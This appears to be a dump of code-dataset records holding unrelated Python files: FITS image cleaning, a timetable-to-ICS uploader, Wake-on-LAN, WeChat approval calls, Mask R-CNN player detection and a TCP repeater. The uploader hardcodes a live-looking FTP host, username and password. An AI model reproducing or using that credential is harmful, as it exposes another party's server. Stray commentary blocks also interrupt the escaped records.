self.cleaned_im = self.cleaned_im.astype(np.float) * im_max # this is a lost cause\n\n # invert back - don't need\n #self.mask = -1 * (self.mask - 1.) \n\n # if testing, save the intermediate background image\n if self.conf.bug_check == True:\n self.save_bugcheck_im(self.cleaned_im, 'bkgnd.fits')\n \n # subtract from original data\n self.cleaned_im = self.im_data - self.cleaned_im\n\n # de-pad the array (because that is what I assume when saving)\n self.cleaned_im = self.depad_array(self.cleaned_im)\n \n\n def fix_px(self, px_val, data, weights):\n # weighted median. Masked pixels have weight zero.\n try:\n return px_val - np.average(data, weights=weights)\n except:\n return px_val\n \n \n def fix_px_med(self, px_val, data, weights):\n # weighted median. 
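# --- The convolve-and-floor step in expand_seg() keeps a background pixel
# (value 1) only when its whole k x k neighbourhood is background, i.e. it
# erodes the background mask, which is the same as growing the masked sources.
# A sketch checking that equivalence against scipy's morphology (both routines
# use a zero boundary by default):
import numpy as np
from scipy import ndimage, signal

bg = np.ones((7, 7))
bg[3, 3] = 0                      # one source pixel; 1 = background

k = 3
conv = np.floor(signal.convolve2d(bg, np.ones((k, k)), mode="same") / k ** 2)
eroded = ndimage.binary_erosion(bg, structure=np.ones((k, k))).astype(float)
assert np.array_equal(conv, eroded)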
Masked pixels have weight zero.\n try:\n return px_val - ws.numpy_weighted_median(data, weights=weights)\n except:\n return px_val\n \n \n def clean_im(self):\n # correct the background via a square median filter, ignoring masked pixels\n self.cleaned_im = np.zeros((self.im_size[0], self.im_size[1]))\n for i in range(self.im_size[0]):\n for j in range(self.im_size[1]):\n # the slices are of padded arrays, and extend the number of pixels given\n # by the half-size of the filter, in self.conf.filt_size, either side of\n # the target pixel. Slice dimension is always odd. \n self.cleaned_im[i,j] = self.fix_px(self.im_data[i+self.conf.pad_px-1,j+self.conf.pad_px-1], self.im_data[i+self.conf.pad_px-1-self.conf.filt_size:i+self.conf.pad_px-1+self.conf.filt_size+1,j+self.conf.pad_px-1-self.conf.filt_size:j+self.conf.pad_px-1+self.conf.filt_size+1], self.mask[i+self.conf.pad_px-1-self.conf.filt_size:i+self.conf.pad_px-1+self.conf.filt_size+1,j+self.conf.pad_px-1-self.conf.filt_size:j+self.conf.pad_px-1+self.conf.filt_size+1])\n\n \n def depad_array(self, im_array):\n # remove the padded region\n depad_array = np.zeros((im_array.shape[0]-self.conf.pad_px*2,im_array.shape[1]-self.conf.pad_px*2))\n depad_array = im_array[self.conf.pad_px-1:im_array.shape[0]-self.conf.pad_px, self.conf.pad_px-1:im_array.shape[1]-self.conf.pad_px]\n return depad_array\n\n \n def save_clean_im(self):\n # save the cleaned image - unpad the array first. Copy original header\n hdu = pyfits.PrimaryHDU(self.cleaned_im) # don't need to depad the array, done during cleaning\n hdu.header = self.im_head\n hdu.writeto(self.clean_name, clobber=True)\n \n\n# main prog.\n\nif __name__ == '__main__':\n\n # get filename arg.\n if len(sys.argv) != 2:\n print('Error: No filename supplied.')\n print('Call as: python clean_im.py ')\n\n else:\n fname = sys.argv[1]\n\n # here are some constants that can be tuned (Using a lambda function as an empty object)\n conf = lambda: None\n conf.exp_seg = 8 # number of pixels by which to expand the seg map in mask making (conv. w. sqyare array, so need twice the required n-px expansion).\n conf.pad_px = 65 # number of pixel to pad the image with - to simplify coding.\n conf.filt_size = 64 # half-dimension of the square filter\n conf.border = 175 # depth in pixels that forms mask region around the border\n conf.clip = 500. 
# pixel-value clipping threshold (used in clean_im_BAD)\n    conf.bug_check = False # do we want to save bug checking images?\n    print('Using config: exp_seg = {0}, pad_px = {1}, (half-)filt_size = {2}, border = {3}, clip_value = {4}, bug_check = {5}'.format(conf.exp_seg, conf.pad_px, conf.filt_size, conf.border, conf.clip, conf.bug_check))\n\n    # create the VISTA image object (will read the data and set up the weightmap filename)\n    im = video_image(fname, conf)\n\n    # run sextractor\n    im.run_sex()\n\n    # read in the segmap and prepare it as a mask\n    im.read_mask()\n\n    # clean the image\n    im.clean_im()\n\n    # save cleaned image\n    im.save_clean_im()\n    \n","sub_path":"clean_im.py","file_name":"clean_im.py","file_ext":"py","file_size_in_byte":8820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"506435137","text":"import PlanFetcher\nimport Plan2iCal\nimport requests\nimport re\nimport glob\nimport ftplib\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\nclass FHFPlan():\n\n    def __init__(self, jg=2014, sg=7):\n\n        self.__JG = jg\n        self.__SG = sg\n        self.__URL = \"http://www.afz-kw.brandenburg.de/main_FHF.html\"\n        self.__PLAENE_ONLINE = []\n        self.__PLAENE_OFFLINE = []\n        self.__PLAENE_AEND = []\n        self.__PLAENE_NEU = []\n        self.__PLAENE_ALT = []\n\n        self.__ICS_FILE = \"SG\" + str(self.__SG) + \".ics\" # file name for the ICS\n\n    def hohle_verfuegbare_plaene(self):\n        ''' Reads all plans available online and stores them in self.__PLAENE_ONLINE '''\n        r = requests.get(self.__URL)\n        html_uebersicht = r.text\n        soup_uebersicht = BeautifulSoup(html_uebersicht)\n        regex = \"E \"+str(self.__JG)\n        uebersicht = soup_uebersicht.findAll(\"li\", text=re.compile(regex))\n        for element in uebersicht:\n            kw = str(element)[11:13]\n            self.__PLAENE_ONLINE.append(kw)\n\n    def hohle_lokale_plaene(self):\n        ''' Reads all locally stored plans and stores them in self.__PLAENE_OFFLINE '''\n        for plan in glob.glob(\"*.xml\"):\n            plan = str(plan)\n            kw = plan[13:15]\n            self.__PLAENE_OFFLINE.append(kw)\n\n    def vergleiche_online_offline(self):\n        ''' Filters out new and old plans '''\n        for i in self.__PLAENE_ONLINE:\n            if i not in self.__PLAENE_OFFLINE:\n                self.__PLAENE_NEU.append(i)\n\n        for i in self.__PLAENE_OFFLINE:\n            if i not in self.__PLAENE_ONLINE:\n                self.__PLAENE_ALT.append(i)\n\n    def hohle_neue_plaene(self):\n        ''' Downloads new plans and saves them as XML '''\n        for i in self.__PLAENE_ONLINE:\n            fetcher = PlanFetcher.PlanFetcher(int(i))\n            fetcher.fetch_plan()\n            fetcher.plan_to_xml()\n            if i in self.__PLAENE_NEU:\n                ical = Plan2iCal.Plan2iCal(self.__SG, i, self.__JG)\n                ical.parse_file()\n\n    def loesche_alte_plaene(self):\n        ''' Deletes old XML files '''\n        for i in self.__PLAENE_ALT:\n            filename = \"E\" + str(self.__JG) + \"_SG\" + str(self.__SG) + \"_KW_\" + str(i) + \".xml\"\n            os.remove(filename)\n\n    def upload(self):\n        ''' Uploads the ICS file to the server '''\n        session = ftplib.FTP('ftp.fasty.org', 'ftp1101228-fasty2', 'Nsdqrltw$10')\n        file = open(self.__ICS_FILE, 'rb') # file to send\n        session.storbinary('STOR /www/' + self.__ICS_FILE, file) # send the file\n        file.close() # close file and FTP\n        session.quit()\n\n    def cleanup(self):\n        pass\n\n    def main(self):\n        ''' Calls all functions in the required order '''\n        self.hohle_verfuegbare_plaene()\n        self.hohle_lokale_plaene()\n        self.vergleiche_online_offline()\n        self.hohle_neue_plaene()\n        self.loesche_alte_plaene()\n        self.cleanup()\n        self.upload()\n\n\n\nif __name__ == \"__main__\":\n    plan = FHFPlan(2014, 7)\n    
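# --- Design note: vergleiche_online_offline() above is a plain set
# difference; the same bookkeeping can be written in two lines (a sketch with
# made-up calendar-week numbers):
online, offline = {"12", "13", "14"}, {"11", "12"}
plaene_neu = sorted(online - offline)   # plans to fetch:  ['13', '14']
plaene_alt = sorted(offline - online)   # plans to delete: ['11']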
plan.main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"510725458","text":"import time\nimport itertools\nfrom os import path\nimport multiprocessing as mp,os\n\n\n\ndef process_wrapper(chunkStart, chunkSize):\n    filePath = path.join(\".\\\\dataset\", \"LFM-1b_LEs.txt\")\n    count = 0\n    print(chunkStart)\n    with open(filePath, \"r\", encoding=\"UTF-8\") as f:\n        f.seek(chunkStart)\n        lines = f.read(chunkSize).splitlines()\n        for line in lines:\n            count+=1\n\n\ndef chunkify(fname,size=24*4096):\n    fileEnd = os.path.getsize(fname)\n    with open(fname,'rb') as f:\n        chunkEnd = f.tell()\n        while True:\n            chunkStart = chunkEnd\n            f.seek(size,1)\n            f.readline()\n            chunkEnd = f.tell()\n            yield chunkStart, chunkEnd - chunkStart\n            if chunkEnd > fileEnd:\n                break\nif __name__ == '__main__':\n#init objects\n    pool = mp.Pool(mp.cpu_count())\n    jobs = []\n\n    #create jobs\n    filePath = path.join(\".\\\\dataset\", \"LFM-1b_LEs.txt\")\n\n    for chunkStart,chunkSize in chunkify(filePath):\n        jobs.append( pool.apply_async(process_wrapper,(chunkStart,chunkSize)) )\n\n    #wait for all jobs to finish\n    for job in jobs:\n        job.get()\n\n    #clean up\n    pool.close()","sub_path":"DataBigMiner.py","file_name":"DataBigMiner.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"386557964","text":"import socket,binascii\nmac = \"3085A9997334\"# fill in your own machine's MAC address here\nmagic_data = 'FF'*6 + mac *16\nsend_data = binascii.unhexlify(magic_data)\naddress='255.255.255.255'\nport=9\ns = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\ns.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST,1)\ns.sendto(send_data,(address,port))\n\n","sub_path":"Python_Code/NetMagicOpen.py","file_name":"NetMagicOpen.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"579176101","text":"import requests\r\nfrom WeChatProject import settings\r\nfrom Approval.tools import getAccessToken\r\nimport json\r\n\r\n\r\ndef submit(subdata, UserId, templateId):\r\n    print(\"submit \"+ subdata)\r\n    requestURL = \"https://qyapi.weixin.qq.com/cgi-bin/oa/applyevent?access_token=ACCESS_TOKEN\".replace(\"ACCESS_TOKEN\", getAccessToken.getToken())\r\n    data = {\r\n        \"creator_userid\": UserId,\r\n        \"template_id\": templateId,\r\n        \"use_template_approver\": 0,\r\n        \"approver\": [\r\n            {\r\n                \"attr\": 1,\r\n                \"userid\": [\"821316134975\"]\r\n            }\r\n        ],\r\n        \"notifyer\": [\"821316158175\",\"821316147075\"],\r\n        \"notify_type\": 1,\r\n        #\"apply_data\": subdata\r\n    }\r\n\r\n    data[\"apply_data\"] = json.loads(subdata)\r\n\r\n    print(data)\r\n    ResData = requests.post(requestURL, data=json.dumps(data))\r\n    print(\"*\"*30)\r\n    print(\"ykyk\")\r\n    print(\"*\"*30)\r\n\r\n    print(ResData.json())\r\n    return ResData.json()","sub_path":"Approval/tools/submitTemplateDetail.py","file_name":"submitTemplateDetail.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"155601745","text":"import os\nimport sys\nimport json\nimport datetime\nimport numpy as np\nimport skimage.draw\nimport random\nimport itertools\nimport colorsys\nimport cv2\nfrom time import sleep\nfrom tqdm import tqdm\nimport math\nfrom PIL import Image\nfrom math import sqrt\n\n# Root directory of the project\nROOT_DIR = 
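# --- Why chunkify() above calls f.readline() after the relative seek: the
# seek usually lands mid-line, and readline() advances to the next newline so
# every chunk boundary falls between records rather than inside one. A tiny
# demonstration of that alignment step:
import io

f = io.BytesIO(b"alpha\nbeta\ngamma\n")
f.seek(3)            # lands inside "alpha"
f.readline()         # consumes the remainder of that line
assert f.tell() == len(b"alpha\n")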
os.path.abspath(\"../../\")\n\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\n\n# Path to trained weights file\nCOCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, \"mask_rcnn_coco.h5\")\n\n# Directory to save logs and model checkpoints, if not provided\n# through the command line argument --logs\nDEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Import COCO config\nsys.path.append(os.path.join(ROOT_DIR, \"samples/coco/\")) # To find local version\nimport coco\n\nteam_1 = [60,60,60,0]\nteam_2 = [200,200,200,0]\narbitro = [0, 102, 204, 0]\n\n# define random colors\ndef random_colors(N):\n np.random.seed(1)\n colors = [tuple(255 * np.random.rand(3)) for _ in range(N)]\n return colors\n\ndef get_mask(filename):\n\tmask = cv2.imread(filename,0)\n\tmask = mask / 255.0\n\treturn mask\n \n#apply mask to image\ndef apply_mask(image, mask, color, alpha=0.7):\n for n, c in enumerate(color):\n image[:, :, n] = np.where(mask == 1, image[:, :, n] * (1-alpha) + alpha * c, image[:, :, n])\n \n return image\n\n#apply mask to image\ndef cut_by_mask(image, mask, color=(0,255,0)):\n for n, c in enumerate(color):\n image[:, :, n] = np.where(mask == 1, image[:, :, n], c)\n \n return image\n\ndef get_dominant(img):\n global arbitro\n data = np.reshape(img, (-1,3))\n data = np.float32(data)\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 200, .1)\n flags = cv2.KMEANS_RANDOM_CENTERS\n _,labels,palette = cv2.kmeans(data,5,None,criteria,10,flags)\n _, counts = np.unique(labels, return_counts=True)\n\n best_palette = []\n best_count = 0\n\n for i, c in enumerate(palette):\n diff = np.sum(np.absolute(c[0:3] - arbitro[0:3]))\n\n #print(\"iter {}: {} with {} counts\".format(i, c, counts[i]))\n if (c.astype(np.uint8)[1] >= 250 and c.astype(np.uint8)[0] < 15 and c.astype(np.uint8)[2] < 15) or (c.astype(np.uint8) <= 30).all():\n continue\n elif diff < 150 and c[2] > 80: \n best_palette = np.asarray(arbitro[0:3])\n break\n else:\n if counts[i] > best_count: \n best_count = counts[i]\n best_palette = c\n\n return best_palette.astype(np.uint8)\n\ndef parse_colors(lst, n):\n cluster = []\n image_array = np.reshape(lst, (len(lst), 3))\n data = np.float32(image_array)\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 200, .1)\n flags = cv2.KMEANS_RANDOM_CENTERS\n _,labels,palette = cv2.kmeans(data,n,None,criteria,10,flags)\n _, counts = np.unique(labels, return_counts=True)\n\n return palette, counts\n\ndef draw_team(image, clusters, counts):\n global team_1\n global team_2\n global arbitro\n\n image = cv2.rectangle(image, (50,50), (600, 320), (150, 50, 50), 5)\n\n fusion = []\n for n, clu in enumerate(clusters):\n fusion.append(np.concatenate((clu, int(counts[n])), axis=None))\n\n fusion = np.array(fusion).astype(np.uint8)\n\n '''if team_1 == [] and team_2 == []:\n sorted_color = fusion[fusion[:,3].argsort()]\n\n squadre = sorted_color[1:]\n\n team_1 = np.append(squadre[0], 1)\n team_2 = np.append(squadre[1], 2)'''\n\n for el in fusion: \n diff_0 = np.sum(np.absolute(el[0:3] - team_1[0:3]))\n diff_1 = np.sum(np.absolute(el[0:3] - team_2[0:3]))\n diff_2 = np.sum(np.absolute(el[0:3] - arbitro[0:3]))\n\n if diff_0 < diff_1 and diff_0 < diff_2:\n team_1[3] = el[3]\n elif diff_1 < diff_0 and diff_1 < diff_2:\n team_2[3] = el[3]\n elif diff_2 < diff_0 and diff_2 < diff_1:\n arbitro[3] = el[3]\n\n #Arbitro \n color = tuple([int(arbitro[0]), int(arbitro[1]), 
int(arbitro[2])])\n image = cv2.rectangle(image, (80,80), (140, 140), color, -1)\n image = cv2.putText(image, \"Arbitri ({})\".format(arbitro[3]), (180, 120), cv2.FONT_HERSHEY_COMPLEX, 1, (200,200,200), 2)\n\n #Team 1\n color = tuple([int(team_1[0]), int(team_1[1]), int(team_1[2])])\n image = cv2.rectangle(image, (80,80 + (80 * 1)), (140, 140 + (80 * 1)), color, -1)\n image = cv2.putText(image, \"Team {} ({} player)\".format(1, team_1[3]), (180, 120 + (80 * 1)), cv2.FONT_HERSHEY_COMPLEX, 1, (200,200,200), 2)\n \n #Team 2\n color = tuple([int(team_2[0]), int(team_2[1]), int(team_2[2])])\n image = cv2.rectangle(image, (80,80 + (80 * 2)), (140, 140 + (80 * 2)), color, -1)\n image = cv2.putText(image, \"Team {} ({} player)\".format(2, team_2[3]), (180, 120 + (80 * 2)), cv2.FONT_HERSHEY_COMPLEX, 1, (200,200,200), 2)\n\n return image\n\ndef getTeam(image, color):\n global team_1\n global team_2\n global arbitro\n\n diff_0 = np.sum(np.absolute(color[0:3] - team_1[0:3]))\n diff_1 = np.sum(np.absolute(color[0:3] - team_2[0:3]))\n diff_2 = np.sum(np.absolute(color[0:3] - arbitro[0:3]))\n\n ret = -1\n\n if diff_0 < diff_1 and diff_0 < diff_2:\n ret = 1\n elif diff_1 < diff_0 and diff_1 < diff_2:\n ret = 2\n elif diff_2 < diff_0 and diff_2 < diff_1:\n ret = 0\n\n return ret\n\n#Take the image and apply the mask, box, and Label\ndef display_instances(count, image, boxes, masks, ids, names, scores):\n f = open(\"det/det_player_maskrcnn.txt\", \"a\")\n\n n_instances = boxes.shape[0]\n colors = random_colors(n_instances)\n\n color_list = []\n\n if not n_instances:\n return image\n else:\n assert boxes.shape[0] == masks.shape[-1] == ids.shape[0]\n \n for i, color in enumerate(colors):\n if not np.any(boxes[i]):\n continue\n\n y1, x1, y2, x2 = boxes[i]\n label = names[ids[i]]\n score = scores[i] if scores is not None else None\n\n width = x2 - x1\n height = y2 - y1\n \n #If a player\n if score > 0.75 and label == 'person':\n mask = masks[:, :, i]\n\n #Create a masked image where the pixel not in mask is green\n image_to_edit = image.copy()\n mat_mask = cut_by_mask(image_to_edit, mask)\n\n offset_w = int(width/6)\n offset_h = int(height/3)\n offset_head = int(height/8)\n\n #Crop the image with some defined offset\n crop_img = mat_mask[y1+offset_head:y2-offset_h, x1+offset_w:x2-offset_w]\n \n '''PIL_image = Image.fromarray(crop_img.astype('uint8'), 'RGB')\n PIL_image.thumbnail((128, 128),Image.ANTIALIAS)'''\n\n #Return one single dominant color\n rgb_color = get_dominant(crop_img)\n\n #Add to the list of all the bbox color found in the single frame\n color_list.append(rgb_color)\n\n rgb_tuple = tuple([int(rgb_color[0]), int(rgb_color[1]), int(rgb_color[2])]) \n\n caption = '{} {:.2f}'.format(label, score) if score else label\n \n image = apply_mask(image, mask, rgb_tuple)\n image = cv2.rectangle(image, (x1+offset_w, y1+offset_head), (x2-offset_w, y2-offset_h), rgb_tuple, 2)\n image = cv2.putText(image, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.7, rgb_tuple, 2)\n\n team = getTeam(image, rgb_color)\n\n f.write('{},-1,{},{},{},{},{},-1,-1,-1,{}\\n'.format(count, x1, y1, x2 - x1, y2 - y1, score, team))\n\n #Group to 3 cluster all the color found in the frame's bboxes\n clusters, counts = parse_colors(color_list, 3)\n\n #Update team's stats\n image = draw_team(image, clusters, counts)\n\n '''file_name = \"splash_{:%Y%m%dT%H%M%S}.png\".format(datetime.datetime.now())\n skimage.io.imsave(file_name, image)'''\n\n f.close()\n\n return image\n\ndef video_segmentation(model, class_names, video_path):\n f = 
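# --- getTeam() above is a nearest-reference-colour lookup under the L1
# metric. The same decision, written once with argmin over the three reference
# colours defined at the top of the file (indices: 0 = referee, 1 = team 1,
# 2 = team 2, matching getTeam's return values):
import numpy as np

REFS = np.array([[0, 102, 204],     # arbitro
                 [60, 60, 60],      # team_1
                 [200, 200, 200]])  # team_2

def nearest_team(color):
    return int(np.abs(REFS - np.asarray(color)).sum(axis=1).argmin())

print(nearest_team([70, 55, 66]))   # -> 1, closest to team_1's grey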
open(\"det/det_player_maskrcnn.txt\", \"w\").close()\n \n # Video capture\n vcapture = cv2.VideoCapture(video_path)\n width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps = vcapture.get(cv2.CAP_PROP_FPS)\n\n length_input = int(vcapture.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Define codec and create video writer\n file_name = \"output/detection_{:%Y%m%dT%H%M%S}.avi\".format(datetime.datetime.now())\n vwriter = cv2.VideoWriter(file_name,\n cv2.VideoWriter_fourcc(*'MJPG'),\n fps, (width, height))\n \n count = 0\n success = True\n\n with tqdm(total=length_input, file=sys.stdout) as pbar:\n while success:\n success, image = vcapture.read()\n if success:\n # OpenCV returns images as BGR, convert to RGB\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n mask = get_mask('roi_mask.jpg')\n mask = np.expand_dims(mask,2)\n mask = np.repeat(mask,3,2)\n\n #Apply pitch mask to esclude the people outside\n image = image * mask\n image = image.astype(np.uint8)\n\n #Detect objects\n r = model.detect([image], verbose=0)[0]\n\n #Process objects\n frame= display_instances(count, image, r[\"rois\"], r[\"masks\"], r[\"class_ids\"], class_names, r[\"scores\"])\n # RGB -> BGR to save image to video\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n # Add image to video writer\n vwriter.write(frame)\n count += 1\n\n #Needed per the print progress\n pbar.update(1)\n sleep(0.01)\n\n vwriter.release()\n\n print(\"Saved to \", file_name)\n \nif __name__ == '__main__':\n import argparse\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n description='Train Mask R-CNN to detect balloons.')\n parser.add_argument(\"command\",\n metavar=\"\",\n help=\"'train' or 'splash'\")\n parser.add_argument('--dataset', required=False,\n metavar=\"/path/to/balloon/dataset/\",\n help='Directory of the Balloon dataset')\n parser.add_argument('--weights', required=True,\n metavar=\"/path/to/weights.h5\",\n help=\"Path to weights .h5 file or 'coco'\")\n parser.add_argument('--logs', required=False,\n default=DEFAULT_LOGS_DIR,\n metavar=\"/path/to/logs/\",\n help='Logs and checkpoints directory (default=logs/)')\n parser.add_argument('--image', required=False,\n metavar=\"path or URL to image\",\n help='Image to apply the color splash effect on')\n parser.add_argument('--video', required=False,\n metavar=\"path or URL to video\",\n help='Video to apply the color splash effect on')\n args = parser.parse_args()\n\n # Validate arguments\n if args.command == \"train\":\n assert args.dataset, \"Argument --dataset is required for training\"\n elif args.command == \"splash\":\n assert args.image or args.video,\\\n \"Provide --image or --video to apply color splash\"\n\n print(\"Weights: \", args.weights)\n print(\"Dataset: \", args.dataset)\n print(\"Logs: \", args.logs)\n\n class InferenceConfig(coco.CocoConfig):\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n config = InferenceConfig()\n config.display()\n\n # Create model\n model = modellib.MaskRCNN(mode=\"inference\", config=config,\n model_dir=args.logs)\n\n # Select weights file to load\n if args.weights.lower() == \"coco\":\n weights_path = COCO_WEIGHTS_PATH\n # Download weights file\n if not os.path.exists(weights_path):\n utils.download_trained_weights(weights_path)\n elif args.weights.lower() == \"last\":\n # Find last trained weights\n weights_path = model.find_last()\n else:\n weights_path = args.weights\n\n\n class_names = ['BG', 'basketball']\n\n # Load weights\n print(\"Loading weights \", weights_path)\n if 
args.weights.lower() == \"coco\":\n        class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n                       'bus', 'train', 'truck', 'boat', 'traffic light',\n                       'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',\n                       'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',\n                       'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',\n                       'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\n                       'kite', 'baseball bat', 'baseball glove', 'skateboard',\n                       'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',\n                       'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n                       'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',\n                       'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',\n                       'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',\n                       'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',\n                       'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',\n                       'teddy bear', 'hair drier', 'toothbrush']\n\n        model.load_weights(weights_path, by_name=True)\n    else:\n        model.load_weights(weights_path, by_name=True)\n\n    # Train or evaluate\n    if args.command == \"detect\":\n        video_segmentation(model, class_names, video_path=args.video)\n    else:\n        print(\"'{}' is not recognized. \"\n              \"Use 'train' or 'splash'\".format(args.command))","sub_path":"player_detection.py","file_name":"player_detection.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"205442787","text":"# encoding: utf-8\n\"\"\"\n[Program 14]\nTask: decompose a positive integer into prime factors. For example: given the input 90, print 90=2*3*3*5.\n\nProgram analysis: to factorize n, first find the smallest prime k, then proceed as follows:\n(1) If this prime is exactly equal to n, the factorization is finished; just print it.\n(2) If n <> k but n is divisible by k, print the value of k, then take the quotient of n divided by k\n   as the new positive integer n and repeat step one.\n(3) If n is not divisible by k, use k+1 as the new value of k and repeat step one.\n\n2. Program source code:\n\"\"\"\n\nnum = 90\n\nfor i in range(2, num + 1):\n    # print(i)\n    while num != i:\n        if num % i == 0:\n            print(str(i) + \"*\", end='')\n            num = num / i\n        else:\n            break\nprint(int(num))\n","sub_path":"studysrc/example/exam014.py","file_name":"exam014.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"274560947","text":"'''\nClass that VIEWS will use!\n\nDo not call function inside this package!!!\n'''\nimport logging\n\nfrom server.apps.catalog.icat.sns.facade import Catalog as SNSICat\nfrom server.apps.catalog.icat.hfir.facade import Catalog as HFIRICat\n\nlogger = logging.getLogger(__name__)\n\ndef not_implemented(fargs,*args,**kwargs):\n    #pylint: disable=unused-argument\n    logger.warning(\"You called a Not implemented function!\")\n    return None\n\n\nREGISTRY = {\n    'SNS': {\n        'get_expriments': SNSICat().get_experiments_meta,\n        'get_runs': SNSICat().get_runs_all,\n        'get_run': not_implemented,\n        'get_runs_as_table': not_implemented,\n    },\n    'HFIR': {\n        'get_expriments': HFIRICat().get_experiments,\n        'get_runs': HFIRICat().get_runs, #(instrument, ipts, exp):\n        'get_runs_as_table': HFIRICat().get_runs_as_table,\n        'get_run': HFIRICat().get_run,\n    }\n\n}\n\n\ndef get_expriments(facility, instrument):\n    experiments = REGISTRY[facility]['get_expriments'](instrument)\n    return experiments\n\ndef get_runs(facility, instrument, ipts, exp=None):\n    if exp is None or exp == \"exp0\":\n        runs = REGISTRY[facility]['get_runs'](instrument, ipts)\n    else:\n        runs = REGISTRY[facility]['get_runs'](instrument, ipts, exp)\n    return runs\n\ndef get_runs_as_table(facility, instrument, ipts, exp=None):\n    if exp is None or exp == \"exp0\":\n        runs = REGISTRY[facility]['get_runs_as_table'](instrument, 
ipts)\n else:\n runs = REGISTRY[facility]['get_runs_as_table'](instrument, ipts, exp)\n return runs\n\ndef get_run(facility, instrument, ipts, file_location):\n run = REGISTRY[facility]['get_run'](instrument, ipts, file_location)\n return run\n\n\nif __name__ == \"__main__\":\n from pprint import pprint\n #experiments = REGISTRY['HFIR']['get_expriments']('CG2')\n # experiments = get_expriments('HFIR', 'CG2')\n # print(experiments)\n runs = get_runs('HFIR', 'CG3', 'IPTS-17241', 'exp381')\n pprint(runs)\n # runs = get_runs('SNS', 'TOPAZ', 'IPTS-18330')\n # pprint(runs)\n ","sub_path":"src/server/apps/catalog/icat/facade.py","file_name":"facade.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198397730","text":"# coding=utf-8\n\n\"\"\"\nThis module provides bidirectional packet switching above the transport layer.\nIt is useful for target runtime which is not able to setup a server. The target runtime simple connect the repeater\n(this module) to switch packets.\n\n* Accepted tcp packet format: [4B as length][payload]\n* Accepted websocket message format: [payload]\n* Switching pattern: [payload] <--> [payload]\n\"\"\"\n\nimport errno\nimport socket\nimport select\nimport time\nimport threading\n\nfrom poco.utils.net.simple_wss import SimpleWebSocketServer, WebSocket\nfrom poco.utils import six\nfrom poco.utils.simplerpc.transport.tcp.protocol import SimpleProtocolFilter\n\nif six.PY3:\n from queue import Queue, Empty\n from urllib.parse import urlparse\nelse:\n from Queue import Queue, Empty\n from urlparse import urlparse\n\n\ndef drain(q, to):\n total_tx = 0\n if isinstance(q, Queue):\n while True:\n try:\n d = q.get(False)\n to.send(d)\n total_tx += len(d)\n except Empty:\n break\n else:\n while q:\n d = q.pop(0)\n to.send(d)\n total_tx += len(d)\n return total_tx\n\n\nclass TcpSocket(object):\n def __init__(self, addr, rxsize=65536):\n super(TcpSocket, self).__init__()\n self.ip, self.port = addr\n if self.ip in ('', '*', '0'):\n self.ip = '0.0.0.0'\n self.s = socket.socket()\n self.s.bind((self.ip, self.port))\n self.s.listen(1)\n self.c = None\n self.rq = Queue()\n self.tq = Queue()\n self.RX_SIZE = rxsize\n self.p = SimpleProtocolFilter()\n print('server listens on (\"{}\", {}) transport socket'.format(self.ip, self.port))\n\n def update(self):\n rlist = [self.s]\n if self.c:\n rlist.append(self.c)\n r, _, _ = select.select(rlist, [], [], 0.005)\n for c in r:\n if c is self.s:\n self.c, addr = self.s.accept()\n print('accept from: {}'.format(addr))\n drain(self.tq, self)\n else:\n try:\n rxdata = self.c.recv(self.RX_SIZE)\n except socket.error as e:\n if e.errno in (errno.ECONNRESET, ):\n rxdata = ''\n else:\n continue\n\n if not rxdata:\n try:\n self.c.close()\n except socket.error:\n pass\n self.c = None\n else:\n for packet in self.p.input(rxdata):\n self.rq.put(packet)\n\n return self.recv()\n\n def recv(self):\n try:\n return self.rq.get(False)\n except Empty:\n return None\n\n def send(self, packet):\n if not self.c:\n self.tq.put(packet)\n else:\n data = self.p.pack(packet)\n 